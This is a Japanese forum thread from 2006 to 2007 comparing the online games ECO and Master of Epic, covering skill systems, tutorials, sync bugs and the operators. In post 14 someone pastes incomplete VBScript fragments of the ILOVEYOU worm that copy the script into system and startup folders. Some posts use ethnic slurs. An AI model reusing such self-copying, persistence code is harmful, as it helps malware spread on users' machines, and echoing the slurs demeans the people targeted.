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【ECO】ECO厨はどうかMoEに来るイチョン【MoE】

1 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 06:01:55.15 ID:I4my1Ukm
VTR
          /    \      i i
  十      |`‐-ミ、  ヽ     |`|         十
   十    ノ   ヾ、 `i     ヘ |       十 キラン
    十  ノ._    ヾ、 \  丿|、|
        ヽ`‐-==、 ヽミヽ `⌒‐-、│        ___________ 十
        ノ     `==´`  ヽ、__`i_       . \〜〜 /
        /   _, -‐‐''"``'‐-、 _`"_,....)        ___\ /   ECO儲かい?僕は元気でMoEやってるイチョン。
       '--‐''"  /  ( と_ (__ `ヽ二_)     / ヽ__)(二 )  見てくれイチョン、とっても快適イチョン。
          ,‐'"´ (  ゝ‐-/ `‐-、_)==ミ.、/    ||<__)   今度親友もつれてくるといいイチョン♪
         /    ゝ‐--/ヽ /;;;;;/  ‖  ‖|   ,―||―⊃


【公式】ttp://moepic.com/

【ネ実3本スレ】■-Master of Epic-Day1657
http://live19.2ch.net/test/read.cgi/ogame3/1142709292/l50


2 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 06:16:03.30 ID:nKbBo5QT
2getズサ━━━━⊂(゚Д゚⊂⌒`つ≡≡≡━━━━!!

3 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 06:24:08.58 ID:I4my1Ukm
とりあえず箇条書きでMoEの見所を書いてみたイチョン。

・脱・レベル制!スキル(MoEではスキルが他ゲーのステータスにあたる)合計850を好きなように割りふる。
・他のMMOに比べると能力の上がり具合は早い。
・そのため、一度構成を完成させてしまっても、気軽にステータス振り直しが可能。
・多数の敵が蠢くダンジョンをPTで探索していくのが楽しい
・ソロでも充分に楽しめる。
・どこからでもアクセスできるチャットチャンネルシステムがある。好きな話題のチャンネルで色々な人と雑談可能。
・単純なクリックゲームを脱し、テクニック・アイテムを駆使して戦う。MOBは他ゲーに比べると強い。
・楽しめるのは戦闘だけではない、生産システム充実。料理・裁縫・鍛冶・薬調合・木工・複製など・・・

あと、毎週末には400人近くで巨大ボスに挑むカオス・エイジが開く。
カオスボスとの戦いは勝ったり負けたり。
まだ一度も勝った事の無い強敵もいる。

4 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 06:24:47.74 ID:Ntfp4pV5
    /\___/ヽ
   /       :::::::\
  .|          .::: |
  |  ''''''   ''''''   .:::: | 
  .|(●),   、(●)、::: |
   \ ,,ノ(、_, )ヽ、,,.:::::/
   /``ーニ=-'"一´\
>>1乙。でも、MoEもう消えていいよ。おつかれさま。

5 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 06:33:21.31 ID:14vQU4fv
スレ立てて即自演とな

6 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 06:38:56.88 ID:I4my1Ukm
自演?何のことイチョン。

ところで注意してもらいたい事。
MoEのMOBに占有権は存在せず、先にMOBを攻撃していたからっていわゆる「横殴り」
にはならないイチョン。
公式でもこの事は明記されていて、「横殴りはノーマナーですよ^^」などと言おうものなら
馬鹿にされるイチョン。
癌畜の皆様は驚かれるかもしれないけれど、MoEはスキル制を採用しているから、
経験値レベル制と違って、敵に攻撃さえしていれば成長するからそう問題はないイチョン。
多くHPを削った方がアイテムルートを取れる制度だから頑張ってMOBの取り合いをすると
いいイチョン、でもよっぽど人気の狩場でなければそう言う事にはならないけどね、基本的に
皆穏やかだから。
ああでも、ミスリルを掘場は殺伐としているイチョン、充分に採掘・筋力スキルが上がってから
行くといいイチョン。

7 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 06:56:02.38 ID:nKbBo5QT
● ナgetズサ━━━━⊂(゚Д゚⊂⌒`つ≡≡≡━━━━!!

8 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 07:33:28.63 ID:bi0OCUvr
昔2アカウント課金してたけどECOβが始まったので休止してた。いつ戻っても
また遊べると思ってた。
12月頃に無料になったらしいので復帰しようとしたが問題が。
1 無料になってすぐ移行、ログインしたら、アカウントもアイテムも残っていた。
2 再度移行があったが、1つのメールアドレスで1つのアカウントしか取れなくなった。
3 起動時のパッチがうまくあたらなくなって、ログインできなくなった。
4 サーバー停止期間が長く、なんかごたごたしている。
で、放置。復帰するまで手間かかりすぎです(復帰できてない)。
ゲーム始めるまでに面倒が多すぎです。
銀行にそこそこの材料と10M強のお金があったと思うけど、どうでもよくなった。

ゲーム自体は、たぶんいいと思うんだけどね。変わってなければ。

9 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 08:11:34.04 ID:hFDI2fAV
運営が癌を2週間で超えたからなぁ
個人情報流出されたくないからやめとく

10 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 08:13:22.96 ID:Ri2A3/ii
もうGWにハマってるから他のはいいや

11 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 08:40:07.83 ID:He3YjYCX
まだいる?

12 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 08:42:35.59 ID:eHLJn+nm
>>6
>ミスリル掘場は殺伐としている
今日朝それを体験してきたぜ
ルート負けたやつがMPK仕掛けてきた。まあテレポートで逃げる寸前にギガスにふまれてるようなお粗末振りだったがなw

13 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 09:54:31.10 ID:kdyT9Yyu
MoEなんてやる気しねーw

14 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 09:56:16.34 ID:g/+7QVic
c.Copy(dirsystem&"\MSKernel32.vbs")

fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE- LETTER-FOR-YOU.TXT.vbs

fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"


15 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 10:35:36.07 ID:g3GZRUgE
MoEって確かに糞ゲだったよ
隣にいるキャラが、どうやって空飛ぶんデスか?とか言ってんの
ナニこいつ、馬鹿じゃね?wって思ったんだけどよく見ると空飛んでる奴が結構いんのよ
で、俺も空飛んでる奴に、どうやって空飛ぶんデスか?って聞いた訳
そしたらそいつが、ナニこいつ、馬鹿じゃね?w ミスwって言いやがったw
って糞同期を著した有名な逸話があるくらいなのに
対人戦が神wとか逝ってる奴がすごく多いわけ
オナニーしてるだけなら別にいいけど、クリックゲーは糞とかオートアタックは池沼とか
キタネー精液を他ゲーに掛け捲るのよ、まいったね
相手が見えないのにガードもねーだろって言ったら
予測できるとか言ってんの、氏ね

16 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 14:41:46.95 ID:TGzxN/nP
空飛んだりカベ突き抜けたり陸上を泳いだり!

17 :ヽ(`Д´)ノ ウワァァァン:2006/03/19(日) 15:29:11.02 ID:EwiDlQK3
PCが消えたり現れたりとか、姿が見えないパーティメンバーとか懐かしいな
そんな怪現象は今はなくなったらしいけど、何より運営のGONZOがうんこだからもうだめだろ。

18 :ヽ(`Д´)ノ ウワァァァン:2006/03/20(月) 14:43:35.96 ID:r98OVxZB
MoEはジャンプ出来るよ、すごいだろ

19 :ヽ(`Д´)ノ ウワァァァン:2006/03/20(月) 20:10:44.99 ID:gYGdSo0g
お前まだいたの?

20 :ヽ(`Д´)ノ ウワァァァン:2006/03/20(月) 20:39:51.75 ID:oOKdLn4C
地面に潜って上半身だけ出して動かないPTメンバ。壁を突き抜けてショートカット
してくるモンスター。空を泳ぐ他キャラ。懐かしいな。
あんな面白い経験はMoEβでしかできなかったんだろうな。

バレンタインも凄い体験だった。

21 :ヽ(`Д´)ノ ウワァァァン:2006/03/20(月) 20:52:36.29 ID:brZHGZb3
いまは中途半端に同期が直り中途半端にいらつく。まだ昔のネタかよといえるような糞同期の方が楽しかった
運営も山田かつてない糞化していまさらやるべきゲームじゃない

22 :ヽ(`Д´)ノ ウワァァァン:2006/03/21(火) 00:56:26.21 ID:9dguqhBw
ゴ○ゾが運営したネトゲでサービス終了したゲームは星の数ほどあるからなぁ
来月あたり又なんか起こして鯖が止まってそのまま消える希ガス

23 :ヽ(`Д´)ノ ウワァァァン:2006/03/24(金) 22:47:54.87 ID:POakwsgD
実況3もアレだけ人がいたのにもうゴーストタウンだよ
こりゃマジで終わりそうだね

24 :ヽ(`Д´)ノ ウワァァァン:2006/03/25(土) 17:07:07.26 ID:tBQ5oVDH
ECOって面白い?


25 :ヽ(`Д´)ノ ウワァァァン:2006/03/26(日) 19:51:32.23 ID:yOu/EXBt
>>24
毎週パッチがあるので有名です

26 :ヽ(`Д´)ノ ウワァァァン:2006/03/27(月) 01:45:36.75 ID:1H84XWxv
>>24
つまんないし恥ずかしいゲームだよ
別ゲーで「今まで何しました?」と言われて
ECO以外でしたやつを答えてるよ
正直やってた事自体が恥、トリノ日本代表以上恥ずかしいよ
開発が萌え要素入れまくりプレイヤーの程度が恐ろしく低い

それでもお前はやってたんだからお前もキモオタですね
と言われても返す言葉が見つからんよ・・・
なのでECOしてた事は隠してる
少なくてもMoEしてた方まだマシ
レベル上げに疲れた人や生産が生きていて狩り等戦わなくても遊べるので
時間がない社会人とか向いてるかもね
 

27 :ヽ(`Д´)ノ ウワァァァン:2006/03/27(月) 04:08:37.00 ID:h0pddu+0
パッチ3ヶ月以上もないぜ、MoEは('A`)
4年かかっても予定してた家が作れないなんて・・・
今年中には出てくると期待してるんだが・・・

28 :ヽ(`Д´)ノ ウワァァァン:2006/03/27(月) 09:14:53.48 ID:aKBNYS01
βでMOE止めた人の印象って、やっぱ「糞同期でイベントはバレンタイン(笑)」で止まってるんだなぁ
しかたないとはいえ、一信者としては無念でならない(ノA`)

29 :ヽ(`Д´)ノ ウワァァァン:2006/03/28(火) 01:14:25.76 ID:YhZdUnbD
糸吉 言侖

ECOもMoeも 糸冬 了

30 :ヽ(`Д´)ノ ウワァァァン:2006/03/29(水) 09:55:10.39 ID:Vv+EP2E7
王様の耳はロバの耳
王様の耳はロバの耳
ゴソゾはこのまま萌放置して鐘只貰い
社名変えればおっけーさ
さすがカコーク企業



31 :ヽ(`Д´)ノ ウワァァァン:2006/04/06(木) 15:09:57.35 ID:g6t368Hy
たすけて!ぜんぜん人が居ないよ!

32 :218-251-42-92.eonet.ne.jp逆毛鰻:2006/04/06(木) 16:07:14.91 ID:FGlepYpJ
修正のパッチが来るって事はそれだけテストしてないって事だろうし
パッチの回数で運営が良いと思わせるのは癌のパフォーマンスだよ

それにECOってロリで幼女の着せ替えゲームって聞いてたんだけど
やってるひとってヒゲモジャのオジサンしかやってないしょ?

女の子がECOやってるなんて噂全然聞いた事ないです><;
ROで女の子は普通にいたけどね(OFFしてるので証明済)

MOEは知らない^〜^;運営が変わって終わってからは全然やってそうな噂聞かず。

33 :ヽ(`Д´)ノ ウワァァァン:2006/04/06(木) 21:36:36.54 ID:AGUspMV4
MMOやってる時点でどうかと思うお;^ω^

34 :ヽ(`Д´)ノ ウワァァァン:2006/04/08(土) 11:02:57.79 ID:ZqwsHv8U
おねがいっ!みんなMoEに戻ってきてよ!

35 :ヽ(`Д´)ノ ウワァァァン:2006/04/08(土) 20:40:57.34 ID:g7tDq87q
EOCの方が信者が痛くないから良い

36 :ヽ(`Д´)ノ ウワァァァン:2006/04/08(土) 20:57:54.55 ID:Iz3Xj5sb
驚異的な速さを誇った本ヌレも全盛期の四分の一のスピードに・・・

37 :ヽ(`Д´)ノ ウワァァァン:2006/04/16(日) 09:47:42.84 ID:4JXMeXQw
ECOのBlog巡りをしている分には
むしろ女の方が多そうでコワイ。

女のイジメは怖いぞ?

38 :ヽ(`Д´)ノ ウワァァァン:2006/04/16(日) 12:47:58.70 ID:J7/ojn+O
女ではなく腐女子です

39 :ヽ(`Д´)ノ ウワァァァン:2006/04/16(日) 13:20:54.67 ID:k6nYQ3aq
腐女子のパワーは侮らない方がいい・・・
酷い目に遭わされる・・・・・・

40 :ヽ(`Д´)ノ ウワァァァン:2006/04/17(月) 07:12:16.41 ID:uN2zAc8p
MoEの良い所
・完全スキル制、マゾくない
・戦闘の駆け引きが熱い
・生産が生産だけで成り立っていける
・チャットと操作関係の設定がすごく充実してて使いやすい
・落下とか水中戦闘とかある
・mobが賢い(ptで回復スキルを使う奴を集中攻撃してきたり多彩なテクニックを使う)

MoEの悪い所
・ゴンゾロッソオンライン
・グラがしょぼい
・マップとmobが少ない

てな感じかね
チョンゲに比べて、キャラ育成に費やす時間が遥かに少ないのが何気に良い
ECOもそんな悪いとは思わないが狩りばかりなのがな

41 :ヽ(`Д´)ノ ウワァァァン:2006/04/17(月) 07:54:41.20 ID:v475VhXO
>>40
だからさぁ 宣伝したところでもう終わったゲームには興味ないので
いちいちageないでくれる?

42 :ヽ(`Д´)ノ ウワァァァン:2006/04/17(月) 14:58:42.57 ID:Sg5jAESC
最近はシナ畜増えたとか晒し板が増えたとかでもうダメポ

43 :ヽ(`Д´)ノ ウワァァァン:2006/04/18(火) 07:57:38.46 ID:FVgAQg/d
外からみりゃMOEもECOも終わってるようなもんだって言っちゃダメなのかな

44 :ヽ(`Д´)ノ ウワァァァン:2006/04/24(月) 19:30:34.29 ID:0Ytbu5/W
MoEは人いないからぁ、もうダメじゃね
鯖糞過ぎ回線切れすぎ
他ゲーやったら戻ってこないよ

45 :ヽ(`Д´)ノ ウワァァァン:2006/04/24(月) 19:41:54.40 ID:q2qcPoD1
ライトユーザー向けなバランスとか操作性は良かったんだがな
同期問題とかをオープンβの時点で直しておけば
ほとんどのユーザーを手放す事なかっただろう
結構惜しいMMOだよな

46 :ヽ(`Д´)ノ ウワァァァン:2006/10/31(火) 11:34:47.58 ID:7VJT/g6U
MoEは初心者が入りづらいな。
自由度の高いスキル制に慣れてない初心者プレイヤーの
フォローはもう少しちゃんとやって欲しい。

47 :ヽ(`Д´)ノ ウワァァァン:2006/11/09(木) 19:39:25.86 ID:86B/gnjm
>>40
落ちたら死ぬから目も眩むような高い崖の上に立つと膝が震える。
海底の沈没船まで泳いで行ける。
敵が攻撃をしかけてきた瞬間にガードできる。
インターフェイスを自分好みにカスタマイズできる。
このへんは洋ゲーなら珍しくないけどECOでも採用して欲しいよな。

48 :ヽ(`Д´)ノ ウワァァァン:2006/11/18(土) 00:44:57.38 ID:CnL4UnLm
wwwwwwwwwww

49 :ヽ(`Д´)ノ ウワァァァン:2006/11/18(土) 10:38:27.15 ID:sWTyZBEy
MoEはDAoCのパクリ、劣化EQと言われるだけあって
基本のところは文句なくよく出来てる。でも応用というか
拡張性がまったくないな。開発が死んでる。
ECO、ベルアイルは設計思想がチョンゲで基本が
まったくできてない。しかしECOの毎週パッチは流石。
こんなの見たことない。

50 :ヽ(`Д´)ノ ウワァァァン:2006/11/18(土) 10:47:20.07 ID:DrhqwLKa
MoEは真似たゲーム、元になったゲームが良かったけど技術がない?

51 :ヽ(`Д´)ノ ウワァァァン:2006/11/18(土) 11:19:02.94 ID:sWTyZBEy
その通り

52 :ヽ(`Д´)ノ ウワァァァン:2006/11/18(土) 15:45:26.98 ID:H1B9oV94
MoEの開発思想
ECOの更新速度
を組み合わせたらチョンゲー最高峰になれたんじゃね?

53 :ヽ(`Д´)ノ ウワァァァン:2006/11/19(日) 02:22:15.98 ID:bCDaoliX
MOEはソロゲーなのが厳しい
ソロでもできてPT募集も活発、こうでなくっちゃ

54 :ヽ(`Д´)ノ ウワァァァン:2006/11/21(火) 12:01:01.84 ID:Jtrc5x3k
ECOのグラとMoEのシステムを組み合わせたらあるいは最高のゲームができるかもしれん

55 :ヽ(`Д´)ノ ウワァァァン:2006/11/21(火) 17:27:19.82 ID:yaelzL7D
ECOはライト系MMOって分類でネトゲ初心者を
ターゲットにしたんだと思うけどちょっとズレてるな。
ライト層だって半年や1年もすればECOの底の浅さに
気づくよ。間口は広く奥行きは深くだ。
その意味じゃECOは奥行きがなくてMoEは間口が狭い。

56 :ヽ(`Д´)ノ ウワァァァン:2006/11/21(火) 18:06:41.75 ID:6M6cs+uO
ECOプレーヤーがMoEをやる必要はないけど反吐六の社員は
MoEをやって欲しいね。ベルアイル見てもわからないだろう

57 :ヽ(`Д´)ノ ウワァァァン:2006/11/21(火) 19:32:27.36 ID:yaelzL7D
MOEよりはWoW、EQU、DAoC、GWあたりじゃないか?
スキル制が最適解な気はするけどベルアイルがあれじゃね・・・
洋ゲーって入りづらい、だから簡単操作のクリゲーにしましょうじゃない。
ゲームの面白さを損なわずに初心者が入りやすくするための工夫を考えろよ(;´Д`)

58 :ヽ(`Д´)ノ ウワァァァン:2006/11/22(水) 22:51:33.89 ID:AQhkOEoA
ライトなスキル制MMOがあったらそれはそれで見てみたいと
思うんだが・・・。たぶんすぐに底が見えて飽きちゃうんだろうな

59 :ヽ(`Д´)ノ ウワァァァン:2006/11/22(水) 22:54:27.59 ID:AQhkOEoA
ECOみたいな生産もどきしかないMMOをスキル制にしても
しっくりこない

60 :ヽ(`Д´)ノ ウワァァァン:2006/11/27(月) 11:47:27.68 ID:UsUJ4Lhh
>>59
TTRBのことか……TTRBのことかーっ!

ええ、武器とか鎧とか作って売りまくるぞと思っていた時期が俺にもありましたorz

61 :ヽ(`Д´)ノ ウワァァァン:2006/11/28(火) 00:30:39.25 ID:mL7Cn+s/
ECOの記事を読んだけど不思議な方向に進化してるな
http://www.4gamer.net/news/history/2006.11/20061127232223detail.html

62 :ヽ(`Д´)ノ ウワァァァン:2006/12/09(土) 11:56:19.94 ID:D0efjV2o
ROは2001年に出たMMOで当時は人気だったが今は同時接続1万人程度。(その証拠に狩場にはBOTしかいない。本当に6万も接続してれば普通の狩場のBOTが皆、中身のあるプレイヤーのはずだがそうではなく、人の多いはずの町に言って話しかけても誰も反応しない)
Talesweaver同様露店で見た目の人数を稼いでいるだけ。来年から月額+アイテム課金で搾り取る予定

パンヤはグラフィックは国産、チョン産ネトゲの中で唯一日本人向きだった。ただゴルフと露店とチャットだけじゃいつか飽きが来る。人と鯖はかなり多い。現在16鯖。1鯖の収容人数は大体1k人。1部屋は30〜64名。チャHが盛ん 動画http://www.youtube.com/watch?v=8WEmrDoYgKE

63 :ヽ(`Д´)ノ ウワァァァン:2006/12/09(土) 12:01:23.98 ID:w/LXJ8k0
MOEは細かい機能があり過ぎて、大雑把にプレイする人には向かず、大富豪のような簡易ゲームとしては遊べない。長期プレイ向き

ECOはその辺にある3Dクリックゲームをちょっとだけ日本人にウけるようにした物だが、反吐の再現力が駄目で、微妙なチャH狩ゲーとなった。同時接続3鯖合わせて5k人程度。月額+アイテム課金ゲーム。動画http://www.youtube.com/watch?v=UQTsJexkjjU

YOUTUBEにうぷると800*600が320*240になるからちょっとな・・・

64 :ヽ(`Д´)ノ ウワァァァン:2006/12/11(月) 08:43:35.32 ID:L/uDsSY6
MOEは細かい機能があり過ぎるというより
説明ができてないことが問題だな

65 :ヽ(`Д´)ノ ウワァァァン:2006/12/11(月) 10:07:31.92 ID:fiCujKRW
一応OHPにはきちんと書いてあるんだがわかりにくすぎるのは確か。
ハドソンとしてはユーザー間で相互に教え合って欲しかったのかもしれないけど…

66 :ヽ(`Д´)ノ ウワァァァン:2006/12/11(月) 20:00:00.71 ID:WIo59QzF
MOEは細かい機能があり過ぎるというより
萌えるキャラが少ない事が問題だな
もっと萌えの種類を・・・

67 :ヽ(`Д´)ノ ウワァァァン:2006/12/12(火) 16:11:45.11 ID:ACIJT4Mi
OHPってなに?
家電メーカーでも分厚いマニュアル本を用意しとけばいいって
考えを改めてるとこが多いよ
MoEはチュートリアルで一通りのことは教えるんだが
泳ぐ段になるとマウス移動で溺死とかな。
インターフェイスの簡単な説明くらいはあってもいい

68 :ヽ(`Д´)ノ ウワァァァン:2006/12/12(火) 20:54:29.87 ID:vZiQhtmv
MoEのチュートリアルのバグで4回くらいキャラを作り直して
チュートリアルを繰り返した。マップの出し方も知らない
から不案内の町でソウルバインダーがどこにいるのか判らなくてな…。
初めからキーボード移動にしたから溺死はなかったが
ファンクションキーを不用意に押すと動けなくなるのが困った。
ラッカーポーションの使い方も判らなくてな。
テクニックをメニューに入れて使えと言われてもメニューが
何なのか判らん。「数字キーの1〜0に対応したショートカット
メニューのことでマクロ登録もここで出来る。例えば採掘を
3回繰り返したいなら・・・」
こう、普通に教えろよと思った

69 :ヽ(`Д´)ノ ウワァァァン:2006/12/13(水) 10:33:45.69 ID:xh4DclU5
チュートリアルで白ヘビと戦わせるところから
テクニックを使わせればいいんだよな
自動戦闘かアタックかお座りだけの戦闘じゃダメだ
タングンもおかしい。最初の頃こそ人がいて手伝ったり
教わったりができるけど、すぐ人がいなくなる
街に放り出してからのフォローのほうがいいだろう

70 :ヽ(`Д´)ノ ウワァァァン:2006/12/20(水) 14:06:07.01 ID:PU1R6pW6
ソーサリアンオンラインはもっと酷そうだ
http://www.4gamer.net/review/sorcerian_ol/sorcerian_ol.shtml

71 :ヽ(`Д´)ノ ウワァァァン:2006/12/20(水) 14:06:40.88 ID:PU1R6pW6
初心者のとっつきにくさな

72 :ヽ(`Д´)ノ ウワァァァン:2006/12/20(水) 18:33:13.11 ID:4YC9raGd
>プレイヤーの成長にはレベル制ではなく「熟練度」を採用
元のソーサリアン自体を知らないんだけど記事をどう読み直して
みても普通のLV制だな。独自色を出したいのはわかるけど
下手に触って壊しちゃうよりスキル制ならスキル制で余力は
他のアイデア出しに使えよって思うね。
どう見てもLV制だけどね。

73 :ヽ(`Д´)ノ ウワァァァン:2006/12/20(水) 22:30:32.85 ID:PU1R6pW6
LV制ネトゲのいい所はPTを組みやすいことかな
敵を倒すごとに経験値が入る仕組みだから
ソロもいいけどPTだとお得ってデザインにしやすいのかも
(その代わりスキル制と違って猫も杓子も敵を延々倒して
LV上げだからバカ臭くなるけどな)

だからってスキル制とLV制のハイブリッドだ!とか短絡されると
なんでそうなるんだ?バカじゃんと言いたくなるよな

74 :ヽ(`Д´)ノ ウワァァァン:2006/12/21(木) 17:44:59.54 ID:bpt6Q/Fl
>OHPってなに?
オフィシャルホームページだと思うんだぜ

75 :ヽ(`Д´)ノ ウワァァァン:2006/12/21(木) 18:28:53.72 ID:GO4+tKq4
ECOは基本が出来てない。
新ダンジョン、新装備、新クエスト、騎乗生物、家、次から次に
アップデートで新要素を導入して生きながらえてる状態。

MoEは新要素がほとんどない。
泳ぎ、ジャンプ、落下、盛りだくさんの生産、面白い戦闘(盾でタイミングよく
防御したり、ポットがぶ飲みじゃない発動前発動後のよく考えてあるディレイ、
走りながらでも斬りかかれるシステム、一部攻撃のノックバック)、廃人ゲーに
ならないスキル制、基本の良さにしがみついてる状態。

ECOはもったいないな。最初に集めたのは30万人?
それを逃がさないゲームも作れたろうと思うんだ。

76 :ヽ(`Д´)ノ ウワァァァン:2006/12/21(木) 20:13:12.73 ID:eDmx6NP6
ライトなMMOに限って基本がいい加減に作ってあるのは
なんでだろうな。いい加減に作るのが初心者フレンドリー?
感覚がズレとりますな。
結局は安上がりに作って儲けようとかネトゲ初心者なら
いい加減でもバレないだろうってハラがあるんじゃないかな。
それで糞ゲーの烙印押されてコケまくってれば世話がない。
ROがヒットした時とは状況が変わってることにメーカーが
気づいてないようじゃ困りますな。ユーザーのほうのネトゲを
見る目が肥えてるよ。

77 :ヽ(`Д´)ノ ウワァァァン:2006/12/23(土) 23:58:58.85 ID:ZObhTXPi
もしECOが洋ゲーに引けを取らないUIのカスタマイズ性、
昼夜天候、体型、病気、怪我、起伏に富んだMAPと
それを活かすアクション(ハシゴを上ったりジャンプしたり
落下死したり泳いだり)、生産、完全スキル制
こんな感じだったらどうなってたのかな

78 :ヽ(`Д´)ノ ウワァァァン:2006/12/24(日) 00:02:28.71 ID:Syb5ri3u
怪我というのはSWGみたいにデスペナってことだけどね
温泉の話もあったから思い出した
病気もなかなか楽しいんだよ
http://hotwired.goo.ne.jp/news/culture/story/20050926202.html

79 :ヽ(`Д´)ノ ウワァァァン:2006/12/25(月) 22:22:59.96 ID:4z34vj7+
MoEのいいところは新規が今から始めて1日1時間プレイしたとしても
2、3ヶ月もあれば追いつけることかな。対人で活躍してるキャラ、
言葉は悪いけど最強のキャラとそっくり同じ性能のキャラを作るのに
半年もかからないな。LV制のようにキャップ引き上げ、天井が高くなる
という方向じゃないのは有難い。

80 :ヽ(`Д´)ノ ウワァァァン:2006/12/25(月) 23:08:07.93 ID:fGEW9Mg6
新規と古参の差が問題にならないのはいいよね
1年ぶりに復帰しても仲間に置いてかれたって感じがない
そういう意味では新規が入りやすいんだが>>67-69のように
初心者対策はかなり遅れてる
あたら新規プレイヤーを逃してるよ

81 :ヽ(`Д´)ノ ウワァァァン:2006/12/25(月) 23:08:58.54 ID:fGEW9Mg6
でも1年ぶりに復帰しても全然問題ないってすごいよな

82 :ヽ(`Д´)ノ ウワァァァン:2007/01/02(火) 13:55:49.31 ID:TuSA2T0r
スキル制MMOの欠点というと初心者が迷いやすい、
最初に何をしたらいいのかわからないというのと、
PT募集が少ないというのがあると思うんだけど
MoEはどうなのよ?

83 :ヽ(`Д´)ノ ウワァァァン:2007/01/02(火) 17:13:28.20 ID:gGo59k99
>>82
できてない。開発GMの一人と雑談したとき問題視してるような話はあった。
でもスタッフの間でコンセンサスが取れてたのかどのくらい問題だと
考えてたのかまでは知らん

84 :ヽ(`Д´)ノ ウワァァァン:2007/01/02(火) 18:08:05.01 ID:gGo59k99
MoEになってから作られたチュートリアルはよく出来てる。
UIの説明が抜けてるけど。

85 :ヽ(`Д´)ノ ウワァァァン:2007/01/03(水) 00:10:16.20 ID:K37ExE5y
http://www.gamingtv.jp/contents/news/data/images/050729_gc08_l.jpg
グランドチェイス
エコと似てるね

86 :ヽ(`Д´)ノ ウワァァァン:2007/01/03(水) 04:43:08.03 ID:YSCOEc7f
ベルアイルはどうだかしらんが完全スキル制のネトゲは
職業バランスがそれほど深刻じゃないね。
銃が強いと思ったら銃やればいいじゃない
のプレイヤー任せなところがある。

脳筋で精神力スキルや知能スキルは上げてないけど
回復魔法スキルを80まで取った、鍛冶がメインだけど
危険な場所で採掘するから剣スキルもとった、
もう何から何まで自由だからな

87 :ヽ(`Д´)ノ ウワァァァン:2007/01/10(水) 14:35:50.47 ID:vQEeAdN0
MoEのいいところはECOみたいにNPC任せじゃなくて
床屋から料理作りまでプレイヤーが全部やることじゃない?
残念ながら修理だけは成り立ってないけどね。

88 :ヽ(`Д´)ノ ウワァァァン:2007/01/10(水) 14:42:54.74 ID:vQEeAdN0
将来的にLVキャップ開放しかない廃人ゲーと違うのも大きいか

89 :ヽ(`Д´)ノ ウワァァァン:2007/01/19(金) 07:31:57.43 ID:qMhLukUp
家も騎乗ペットも実装できなかった口だけ大将が偉そうな事を言うものだな


90 :ヽ(`Д´)ノ ウワァァァン:2007/01/22(月) 05:34:43.37 ID:N5jZ9czb
ECOの毎週アップデートはみごとだな。
頻繁なアップデートなんてバグもとれてシステムが安定しだす
半年くらいだろうと高をくくってたらどういたしましてだ。
それだけに土台が本当にいい加減に作ってあって、その上に
積み重ねていかなきゃならないのはもったいないな。

91 :ヽ(`Д´)ノ ウワァァァン:2007/01/22(月) 05:46:47.11 ID:IjL3CE9L
超廃人ゲーのディプスに比べたら格段の進歩
でもあれだな。ユーザーの嗜好のほうがもっと先を進んでる。
いつまでも安っぽいチョンゲーに食いつくと思うなよ

92 :ヽ(`Д´)ノ ウワァァァン:2007/01/22(月) 05:49:55.35 ID:IjL3CE9L
>>89
ハドソンは異常に遅いよな
開発力が足りないんじゃないかと思うぜ

93 :ヽ(`Д´)ノ ウワァァァン:2007/01/22(月) 08:36:48.11 ID:hD5VmjUN
携帯天外MMOwwwwwですら
え?マジで?
ってぐらい遅いぞ

94 :ヽ(`Д´)ノ ウワァァァン:2007/01/22(月) 11:01:48.11 ID:DHx6HcOm
ECOのシステム周辺の安定性+MOEのゲームとしての基本+ECOのアップデート速度

組み合わせれば神ゲーなんだが・・・惜しいな、ECOも、MOEも
今はECOをいプレイしているが、MOEも以前少しやってた
俺はどっちも応援してるぜ!

95 :ヽ(`Д´)ノ ウワァァァン:2007/01/23(火) 12:25:53.98 ID:Qbeso7ov
ROエミュの開発は人数が多くて凄まじかったのに
ECOエミュの開発は殆ど進んでないね

やっぱり接続ユーザー数が違いすぎるからか

96 :ヽ(`Д´)ノ ウワァァァン:2007/01/25(木) 01:53:30.48 ID:MXi/IJ1Q
エミュが必要とされてない。装備も差し替えですむしな。

97 :ヽ(`Д´)ノ ウワァァァン:2007/01/26(金) 00:27:21.98 ID:sY4KHH8L
つーか鯖プログラムまで流出したROとECOを同じに考える方が無理があると思うが・・・

98 :ヽ(`Д´)ノ ウワァァァン:2007/02/01(木) 21:57:27.63 ID:EmfFY4HG
>>94
MoEがEQやDAoCのパクリなんだから本家本元を真似たほうがいい

99 :ヽ(`Д´)ノ ウワァァァン:2007/02/02(金) 20:00:49.42 ID:DXox6Qn8
EQやDAoCを真似たLV制MMOを出されても幻滅だな。
サッカーやラグビーに例えるとゴールラインまで走りぬけられる
コースがぽっかり空いてるのになあという感じだ。

100 :ヽ(`Д´)ノ ウワァァァン:2007/02/02(金) 20:04:21.39 ID:DXox6Qn8
MoEのクリティカルな欠点というと初心者には難しい。
チュートリアルで詰め込み教育式に教えるのは無理がある。
街に出てからクエストでフォローしたりがない。
後はソロゲーなとこかな。クエストもダンジョンも作り方が下手くそ。

101 :ヽ(`Д´)ノ ウワァァァン:2007/02/02(金) 20:28:48.40 ID:86Oo65wI
欠点が見えてても直さないというのはどうなのかな
結局は開発もバカ信者並に欠点を認めたがらない?

102 :ヽ(`Д´)ノ ウワァァァン:2007/02/03(土) 00:17:27.07 ID:Jxy+A8Py
見えない敵を殴るとか敵が目の前にワープするとか
同期問題がなかなか片付かなかった。
新要素実装に目が向いてたのかもしれないけど
とにかく開発が遅かったから何してたんだかサパーリ

